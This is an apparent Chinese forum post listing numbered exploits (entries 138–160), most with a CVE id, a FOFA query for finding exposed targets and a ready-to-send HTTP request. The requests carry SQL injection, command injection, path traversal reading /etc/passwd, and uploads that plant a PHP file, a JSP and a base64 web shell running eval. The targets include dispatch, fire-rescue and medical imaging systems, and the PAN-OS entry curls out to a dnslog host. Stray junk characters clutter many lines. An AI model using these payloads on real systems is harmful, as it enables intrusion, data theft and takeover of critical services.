' j7 F: Q& t  @1 `0 [4 d5 y
9 J$ l5 x( w0 }" D+ @3 x4 R) w4 W" [0 w2 I' B
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入6 p; l3 Z1 c3 m. l; s1 N
CVE-2024-2621& f  R/ |4 b, G% o% F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% ]& l# f  G8 c- I  g1 ], ~GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1! Q! K4 g1 M6 v2 h
Host: x.x.x.x
4 k2 a! B0 E* Z8 {: k6 _  aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! u3 u2 h2 Z. \+ `0 N: z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, _1 C& |6 F, M3 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ I$ d# F) Y7 E. d& p7 g
Accept-Encoding: gzip, deflate, br
% Y2 a! y2 m* {& C0 Y( x: f" tConnection: close
6 m2 E$ V# E: cUpgrade-Insecure-Requests: 1+ l1 A* `% v. h' g- V  Y' a

( n; `% p/ A2 Q  {+ P6 K8 G7 ~: _! R6 _  J% n( f0 }2 T6 Z
139. 福建科立讯通信指挥调度平台editemedia.php sql注入3 [. a3 l& `  N7 y/ {
CVE-2024-2622
( a- n( `+ h. GFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 B$ X2 c/ Q0 J. P1 S- I1 y
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.10 O0 C/ Y! q& J. G2 Z
Host: x.x.x.x$ {: I/ G# u; D9 @- `& t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& c7 `/ a% E# t' c$ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, q& Y8 |* L* c" ]4 q3 U2 P6 S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' `: A$ Q8 }$ i9 L
Accept-Encoding: gzip, deflate, br
& H# C1 X$ j# z% }1 j& fConnection: close+ l2 P/ x: U! _+ o1 @, y% {
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk4 _! o2 e* I& J% f$ d) h( Z
Upgrade-Insecure-Requests: 18 C# G- H8 E. T$ g, ^
( }6 Q$ m7 ~" S2 z& S
1 `( G9 T6 ?/ n) I  T
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
& p8 L  m+ o% z+ f0 e- pCVE-2024-2566, t) i) i; F# P
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"  z! z$ Z# `* x3 U
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
) x- d# M3 T) ?1 ^  U) L, bHost: x.x.x.x
# c0 f3 N. D4 D1 a; e+ ~" ~- TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# T, {6 u" |9 A" \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- [6 h& B0 p2 S( Q( |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  |& W7 C4 ^3 _. p: |
Accept-Encoding: gzip, deflate, br
& ], a% [: Y3 r" s* I; I+ nConnection: close
. H0 \. W: _$ Y% K: V* vCookie: authcode=h8g9
7 ?% D- z$ t& KUpgrade-Insecure-Requests: 1
5 g7 ^7 z& D( r& v
( u) T* x: j7 R9 Y, X1 q( x; k' I4 s3 o3 d
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入" ?# G- @) z/ b2 U  ~
FOFA:body="指挥调度管理平台"
$ u( O% h$ @% K9 m+ @8 G- LPOST /app/ext/ajax_users.php HTTP/1.1
2 z; q- D& _0 i% E3 H& o* HHost: your-ip
, f$ M' g# v- C! X. p5 e5 EUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( I" J% e: G3 \$ Z! U
Content-Type: application/x-www-form-urlencoded: D4 t3 k8 u) [6 L

% ~2 S+ ]: o1 T  n8 \% L# W* r# m" N4 r( d5 }; d3 F- O7 {  c0 k
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -/ I- J2 I7 m0 H7 A  y& g2 ]

( g% B) B) h8 i7 P+ j( Y( d3 B  `2 Z+ E; o  t- |
142. CMSV6车辆监控平台系统中存在弱密码
3 Q' v4 d9 v% p) R$ R8 |$ cCVE-2024-29666
1 t0 o' O5 B# `, E) \% I+ RFOFA:body="/808gps/"" X4 ~  F' ~4 B
admin/admin
' X+ Q$ |7 x0 [2 L143. Netis WF2780 v2.1.40144 远程命令执行
) {( a0 Q' i- X5 K6 D3 FCVE-2024-25850$ @; s2 m: D* n  T7 q
FOFA:title='AP setup' && header='netis'
% ]) _3 ^  ~- z" g1 |PAYLOAD
- K* a& u* O. T" ~) b
5 E; f2 _" b7 z. R) U9 n144. D-Link nas_sharing.cgi 命令注入' `2 K- V3 v8 ~0 Q5 l% j8 C
FOFA:app="D_Link-DNS-ShareCenter"1 F) {2 M( L3 \* Q0 q
system参数用于传要执行的命令' g7 `5 T% H3 J! I4 k/ D
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.10 ~! r  ~; [& b# `
Host: x.x.x.x# J3 ~7 H$ ]# f. k8 u  R
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.02 M/ }- J1 N7 E. x# g: R% a
Connection: close) J" f. b: z& m+ L  Y+ T; z$ c& w
Accept: */*
& M4 k; w9 V/ kAccept-Language: en
, x* r# M8 T7 C# Y! V/ T9 J. vAccept-Encoding: gzip
* y7 ]; g. S4 r
$ \2 F* m! l( R1 E
. E9 K8 ^' s  a! Y9 B  u. z0 ]145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
" f6 [( n3 d# h% bCVE-2024-34005 ?3 C5 N0 E2 |; d7 a! E
FOFA:icon_hash="-631559155"
  j$ \$ f( g/ ?& f; RGET /global-protect/login.esp HTTP/1.1
" A- [! t- C7 @7 t# D; V( K5 b" fHost: 192.168.30.112:10050 J8 Y, F: Q9 g! [7 s, c  s$ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 [6 _; q, w( R
Connection: close
4 n- F( s# K  YCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;0 |5 B) _3 B( I9 }
Accept-Encoding: gzip
- u: i- F4 V. [6 w: {) [- Z6 b' I6 i; |/ m  A( f# s
) a8 m, s. H  T* {1 w& P# J
146. MajorDoMo thumb.php 未授权远程代码执行: a! p) V4 ^6 \  v, S
CNVD-2024-02175
' S7 c0 o" z+ _; j! eFOFA:app="MajordomoSL"2 o: k: s6 f# B$ A0 {
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1% Q" T- f+ Z1 N% |$ g
Host: x.x.x.x
3 i( W! L# w( g7 _* ]. jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
7 W2 Q6 n) g1 k: j- VAccept-Charset: utf-8
7 X7 x9 G- m) u9 Z1 TAccept-Encoding: gzip, deflate3 _1 G  [9 r& q: h0 R
Connection: close- K1 S/ L5 W) r: E
6 V( l$ l6 w! m- l2 l, T( z

: w, b; S$ U+ k8 V6 l. |147. RaidenMAILD邮件服务器v.4.9.4-路径遍历  _: q4 i' y( G
CVE-2024-32399" W& t. K( g5 M0 B
FOFA:body="RaidenMAILD"+ q5 X2 T+ }- ~9 f
GET /webeditor/../../../windows/win.ini HTTP/1.1% ~9 L2 H% {: x( }
Host: 127.0.0.1:81  o6 r, g$ F8 Z$ Z0 k+ `9 |
Cache-Control: max-age=0
! d# b1 ?( H7 z( NConnection: close
  V/ x) \1 Y' x( A
; N+ \  b) ?; g* n) u- `! H# B( b( N) E* z
148. CrushFTP 认证绕过模板注入+ Z6 d: F' J5 B! b
CVE-2024-4040- i* ~; x, q( v
FOFA:body="CrushFTP"
$ {: O& I( L6 Y- D, S& O, s6 `3 E" |PAYLOAD. ]3 @7 B7 R; F3 s$ W' @+ q) w# z

* Z7 M& o! C2 J149. AJ-Report开源数据大屏存在远程命令执行
) W4 t( C; r% m2 u; m7 n5 NFOFA:title="AJ-Report"
7 k* Y9 c& J* j5 ?9 k7 U# d" ^3 P3 R% s9 z7 C% c  K, ^, ?7 [
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1. b- g  F+ c! e5 x3 p5 H& X- H2 J
Host: x.x.x.x
5 D! I/ `, O3 ~( Z# ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ S- g/ @2 D  B9 S5 S& tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 C' j8 [& h6 \2 G! R
Accept-Encoding: gzip, deflate, br  A! G. v2 y- z8 f* J7 g
Accept-Language: zh-CN,zh;q=0.9! ~! R) W7 M8 b1 d* d  I& F" `( X
Content-Type: application/json;charset=UTF-83 F; z4 i/ h, K" S
Connection: close
) e. i: I- ?0 T+ Q- }8 N; ~3 c- q9 r
0 L1 G4 a$ b9 R{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
; F7 ~7 D- }! z7 l9 `" U+ i; Y( E% r' g* q* K
150. AJ-Report 1.4.0 认证绕过与远程代码执行/ \! |/ Q# w; R+ z' s+ ?8 A, D
FOFA:title="AJ-Report"
8 i5 r$ b0 Y/ b) r" rPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
4 O  H3 x6 U: X- [- IHost: x.x.x.x
* v) [5 f$ j! l& N/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# h# L$ f' i  y( w7 m. ~0 L) i* E: \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 q! a7 ~4 J1 i* u6 }8 I1 JAccept-Encoding: gzip, deflate, br8 v5 e- b8 t3 ^! l' @
Accept-Language: zh-CN,zh;q=0.9
  A6 a/ ?5 X+ t* DContent-Type: application/json;charset=UTF-8
  X: b% c' D8 }Connection: close. P' ^. u  R! W) B, D. i
Content-Length: 339- [4 v* E7 K! A! C/ `
7 O4 L  s; @; I# F* D, t  w6 _3 o, [
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
1 N4 K# g8 K0 q% g0 l- @! x9 r! `1 A- L  t' k. V% z- a. q" E) q
0 d& I9 d2 u0 _5 K9 s
151. AJ-Report 1.4.1 pageList sql注入. \# z' }; L" {( ]
FOFA:title="AJ-Report"; ~* q* A) H" ]. }' E' E
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
8 e4 U! D0 O: Q! a$ T/ G2 ]/ b2 f& ^Host: x.x.x.x; M- x3 e' Q9 z# G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 ?$ X2 a/ y1 Z2 x" YConnection: close& ~2 w, b6 D. K9 h1 z
Accept-Encoding: gzip
: @" v! }! `* i  S# s8 I+ h, S$ V2 f4 A& e* x& S7 e
! I. e3 ?4 b" O8 u+ B/ J8 ?; B6 S  b
152. Progress Kemp LoadMaster 远程命令执行; G- M3 D0 e& j% g" U  W- z! D
CVE-2024-1212
' @; y( C4 M! \  @5 ^3 GLoadMaster <= 7.2.59.2 (GA)
: r9 O* N/ L0 m$ F6 `7 LLoadMaster<=7.2.54.8 (LTSF)8 ?8 V9 u+ l( M$ J! b1 T
LoadMaster <= 7.2.48.10 (LTS)  X0 G- c6 f' u7 }/ q3 I# k1 C6 c
FOFA:body="LoadMaster"  ^2 [! e# Z* S9 i$ ^
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
) i# k* {! I2 n, F) e# nGET /access/set?param=enableapi&value=1 HTTP/1.1& |: Q+ ]! {4 l2 G2 T- }/ U
Host: x.x.x.x, v! R1 A- ], K) `( @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
( T# w$ N$ ]- H+ C4 }* f+ a% C9 s6 E0 s' jConnection: close. E( K* S$ S/ D; F; }
Accept: */*8 i) X3 {' X5 o& }6 P
Accept-Language: en
) g/ K6 g. a8 w& W. [: WAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=' o1 P, W8 f' l' h: X2 ~9 y7 T; Q* u$ A
Accept-Encoding: gzip
! r8 N! E6 ?. A$ b8 J! u0 z- \( s1 y
# U; [( ^4 q, N. v) |2 D8 i6 B  w% R: I0 T
153. gradio任意文件读取, v5 N* `. e' E- y8 k) u; E* C
CVE-2024-1561FOFA:body="__gradio_mode__"
0 k' C" \9 i. i第一步,请求/config文件获取componets的id/ S/ g6 A4 S$ N
http://x.x.x.x/config
3 T7 a2 N, ~5 j. \# c- K. z5 E1 s* t6 q- r; j$ u8 q
7 @# F; ?  A) w! ^2 R. Y7 y7 ], {3 |( |
第二步,将/etc/passwd的内容写入到一个临时文件
" j- x8 y" M0 X3 V: gPOST /component_server HTTP/1.1; G2 ^$ H. c0 ]0 A4 I
Host: x.x.x.x6 w" r) v) ~4 b  |" q; `  L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
( R; @; \) |& l6 I2 Y% oConnection: close2 D( n6 w* U! m( T& _6 `
Content-Length: 115
5 k" P- O! ?5 e2 aContent-Type: application/json1 l/ k; a. @4 M) \% b
Accept-Encoding: gzip% Y, @3 m% h) s
" u5 `" \* K9 {. T. r8 p
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
  L2 Y$ ?+ A2 B( t( i! \
, V" B, g- ^9 |$ v3 [' V& M2 O1 m7 U  O& v* \
第三步访问. ^/ _1 u% @% J) U
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
+ Y" {$ q3 x6 `. F
' O* s7 w' G6 v$ k! J) G, G" ]( L/ C: E/ D) K
154. 天维尔消防救援作战调度平台 SQL注入1 D/ N1 H0 c4 m, I
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"" d# W7 u. ]+ z) B7 V
POST /twms-service-mfs/mfsNotice/page HTTP/1.18 m/ y) [" {1 B
Host: x.x.x.x& ?* Q& C2 Y+ V( j' N
Content-Length: 1062 U+ b' l, M" W" Q7 \* t, z* r" W
Cache-Control: max-age=06 k$ o- b. v, Z; _" o
Upgrade-Insecure-Requests: 1
% q1 \0 e# L# W% j: w) i! AOrigin: http://x.x.x.x
+ J; h5 t* ^8 b. \: K6 d2 i( ZContent-Type: application/json
# ~& j. Z, e, y* ~+ f/ FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
1 C5 a2 \+ z  s# DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- A9 b6 F( y9 w7 M6 D/ H- {
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
4 t4 m8 O0 Y4 B4 KAccept-Encoding: gzip, deflate! _9 q( p5 i9 O2 v
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
$ g+ \! S, @( e( O+ ~Connection: close( v5 ^" ?, e5 X) F1 p$ x; i& C$ i- n
9 H5 x% K9 t8 T/ c* ^5 ?
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}' U7 Q% x; y7 s$ \5 @/ a
9 A4 u$ x" k6 Q  {% w, h
3 p+ F( L- w& u- R+ L* i4 J
155. 六零导航页 file.php 任意文件上传& k0 e% A% `" C6 W- H; ~
CVE-2024-34982
+ R) I& U, F  N3 DFOFA:title=="上网导航 - LyLme Spage"
- l; {+ d4 [+ p2 sPOST /include/file.php HTTP/1.1
- M: C( F( Z/ {$ i, a% `Host: x.x.x.x% {' z" }2 Q1 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% M; @1 ~' j* S7 z/ N# Z! w( j4 I5 O
Connection: close* l& F- i/ S, o& `% f8 Z" b
Content-Length: 2327 \7 t3 x  k9 Z9 b+ t
Accept: application/json, text/javascript, */*; q=0.014 V3 f8 J- ]6 w& h1 k
Accept-Encoding: gzip, deflate, br1 r& \7 C' a' D7 j+ ~! T' z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! E" s. R' j: vContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
1 `1 N7 v" t# i: U) pX-Requested-With: XMLHttpRequest
1 d/ v5 _) p2 [2 a0 {$ i5 N! N% Y: O7 n- Z
-----------------------------qttl7vemrsold314zg0f
6 g* Z+ U( b2 Q7 w# s( f4 OContent-Disposition: form-data; name="file"; filename="test.php"
7 m7 L/ B" S0 H* b# A( z& H1 t& q. gContent-Type: image/png5 |  S' x( I, g3 S. T* z( l1 k
  B& u: Z6 E( Z7 ~& F, M. ^8 r
<?php phpinfo();unlink(__FILE__);?>
8 [& o- Q5 u7 r4 u$ [# e( D( Q-----------------------------qttl7vemrsold314zg0f--
% O, |# p( R3 ^6 I8 w! I$ b; T8 _9 }
$ ?' `: _5 c3 O' C" \. L2 R6 Q$ s. U( G; b; [7 e  f
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
! t8 `7 t9 e! C9 H2 o3 M" ?* _
" G3 \9 B8 ?( B# Z' y5 q" q156. TBK DVR-4104/DVR-4216 操作系统命令注入4 f8 D, H& v7 j
CVE-2024-3721- R/ i1 W' S7 G4 _) J# V
FOFA:"Location: /login.rsp"
: k) x0 C& j0 T& H/ n* \6 B·TBK DVR-41045 X9 G  {  L; |3 k1 v
·TBK DVR-4216' W& ^4 `8 T5 r3 v+ ~8 `' p/ G
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"! \; u0 F8 J* F5 o- t) _1 V

7 d# m3 N3 K9 B  x* j3 U. C
+ F& X: Y, q) u/ e' M7 MPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
$ r! i- ?* n/ j5 D3 \. wHost: x.x.x.x
: e4 p! k0 @: d) Z! bUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 I8 h+ w7 M! t# N1 M/ `( A
Connection: close
# t+ I; `  K8 k4 O. v  d# NContent-Length: 0( |, Q1 |# x; M# V0 k' ?1 [- i
Cookie: uid=1. Y% w* g. u  i
Accept-Encoding: gzip
4 x  E: L  L, R' V5 [/ P6 ~) l% u& G3 r- N  Z/ k9 E8 Y
- P9 \; _6 |4 |
157. 美特CRM upload.jsp 任意文件上传
, `1 D$ z# o: A' vCNVD-2023-06971* P% Z  o6 ~( y# L
FOFA:body="/common/scripts/basic.js"2 f3 r; @8 h& M7 S" y
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
2 U. [# x4 y1 F' LHost: x.x.x.x6 [7 ^3 g( ]) R+ z5 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ A% ?3 }9 a8 f/ n
Content-Length: 709
. |# {- A( g+ F3 R) n0 W' g' yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( m1 P- W( y; i3 Q: a3 D2 EAccept-Encoding: gzip, deflate
/ `: [  Q/ y2 ^0 tAccept-Language: zh-CN,zh;q=0.9
* ]1 N0 M0 Z% C0 E/ L. o. jCache-Control: max-age=0' K  \! u% N  P; q" b% z( P7 Y
Connection: close
3 P4 {* E, @, p" E: l/ ~8 ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
6 r4 q# B6 i- ]Upgrade-Insecure-Requests: 1. d2 [+ a* _& B" ^" o& Y
' R4 c" q- A1 I5 I
------WebKitFormBoundary1imovELzPsfzp5dN; F. ^/ x1 {2 l' o1 y! \
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"$ g5 m1 T4 I! G8 M+ I: b
Content-Type: application/octet-stream3 Z1 Y) C( W; R2 I
2 I8 u5 C# b& a6 X  X
nyhelxrutzwhrsvsrafb5 f) B; x9 M  U! R* f
------WebKitFormBoundary1imovELzPsfzp5dN
8 u8 H2 n7 X1 KContent-Disposition: form-data; name="key"
* K6 t; H- D% e8 G( B+ d/ b/ D/ ]# ~1 f# M1 I4 H% _2 P6 K5 ]4 k
null% F, n7 a& L" _3 n7 q0 m' @
------WebKitFormBoundary1imovELzPsfzp5dN  `  T! Q5 Y% B
Content-Disposition: form-data; name="form"
% K8 b( e" f& L! O  H# q3 Z
9 C! p/ ]; ~5 B6 t' Z. Y4 |- e6 rnull
# n; @4 U5 z. E5 Z- R- w1 i: B------WebKitFormBoundary1imovELzPsfzp5dN
6 w( L# _; |+ |1 g) MContent-Disposition: form-data; name="field"
9 k- e# {# B4 h2 T1 D' B  u/ h+ e6 f* z- @! h% F6 b
null
4 f, k8 b1 `" I------WebKitFormBoundary1imovELzPsfzp5dN' j+ \$ ~" \# I
Content-Disposition: form-data; name="filetitile"
" v5 Y* Y! N% n! z, U1 S6 O8 G, ?' m% `2 [
null
; |4 q' O: O# J- W: W; G: D------WebKitFormBoundary1imovELzPsfzp5dN: X* a7 q$ t8 l% ?$ e. b( f
Content-Disposition: form-data; name="filefolder"
9 o1 j9 o, k# b# L
, k: A7 k; k  enull
6 R8 a+ k! }# G+ `& S: u/ H, q------WebKitFormBoundary1imovELzPsfzp5dN--! h/ j4 n& _7 |" H

0 }- H$ Y- N& w& u6 O7 W! q2 L6 B: k+ Y2 N/ H/ B: j+ ]
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp+ i5 p' R7 g. t
; f+ q) q2 `; J% ]# d
158. Mura-CMS-processAsyncObject存在SQL注入. B- t! d/ z  ^2 g
CVE-2024-32640
6 x9 h; s5 Z4 A* s( VFOFA:"Generator: Masa CMS"
7 S8 b* a3 u4 \4 }6 mPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
1 l  U" w" o  M5 C. N9 vHost: {{Hostname}}
2 q* n- [) P' gContent-Type: application/x-www-form-urlencoded# z7 M2 t3 W/ [6 m+ p) \; A5 w9 L/ N" a

) n; F% I! V/ i. q- M' f) Zobject=displayregion&contenthistid=x\'&previewid=1; {2 a4 a# I: ^! Z% j

2 B* D* g) i& i, q4 D7 p& B6 A. {7 T
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传2 ]4 ]* }/ G) o7 O6 B' D( U! K) a3 r
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")6 Y( B: q' f( |% j$ O
POST /webservices/WebJobUpload.asmx HTTP/1.1' z+ ~; A7 T. H
Host: x.x.x.x& `3 j+ g" \2 C% Y% r" [; g2 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36( V% E/ Q1 A0 l8 a6 b
Content-Length: 1080" Q" `( q8 ]. `8 `$ i& I" d- ~
Accept-Encoding: gzip, deflate
# X" j/ m* @5 c: K/ O; z2 H; XConnection: close
9 |/ q* B* u: {1 R& y& S! C% w/ q  {Content-Type: text/xml; charset=utf-8
  |1 c5 I8 ~2 B* V/ D' p% aSoapaction: "http://rainier/jobUpload"
1 w3 y# }2 N' f( h& j
$ D8 N" z8 ~" G4 j6 j6 z; m<?xml version="1.0" encoding="utf-8"?>  Z, e; d$ k! a' |  k- O
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">/ ]' s/ j( u% ?# x+ A7 J8 g: u
<soap:Body>
" E) C" S1 I8 I1 |. t<jobUpload xmlns="http://rainier">/ F& Y$ `8 X$ F$ `( [+ r
<vcode>1</vcode>1 w  m" G! J" H$ F. }  i
<subFolder></subFolder>
* Z9 T* ]9 E1 ]3 G9 J& Q; M+ c<fileName>abcrce.asmx</fileName>& Y& t- r4 l+ B5 `, R7 {7 L2 c& c
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
6 n: r2 A: T& P9 @. ~5 j5 }</jobUpload>2 z  H8 I2 Z4 i( f  P% O
</soap:Body>. ~+ ^( ?) T4 K4 L1 J6 q: F# S
</soap:Envelope>
2 Q& w- @+ l5 z/ w& S% ]5 N
1 J- K9 z- z. F- [
# j; }1 g3 ?! \1 V4 S4 f) h" Y' e* p. W/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
3 |1 _" z; }) p9 C$ g% q
& L. e2 f2 M6 T, I  Q+ m" Q) ?2 j" ^2 \8 I
160. Sonatype Nexus Repository 3目录遍历与文件读取
6 |3 T! U& w  ^: ~, UCVE-2024-4956
3 z5 G" z1 s8 z2 GFOFA:title="Nexus Repository Manager"
# i+ ~4 `4 ?2 y; x7 a' eGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
1 r" }; B* m! V1 A6 m: Q9 EHost: x.x.x.x" A" C; v+ W7 ~" V: U" I
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
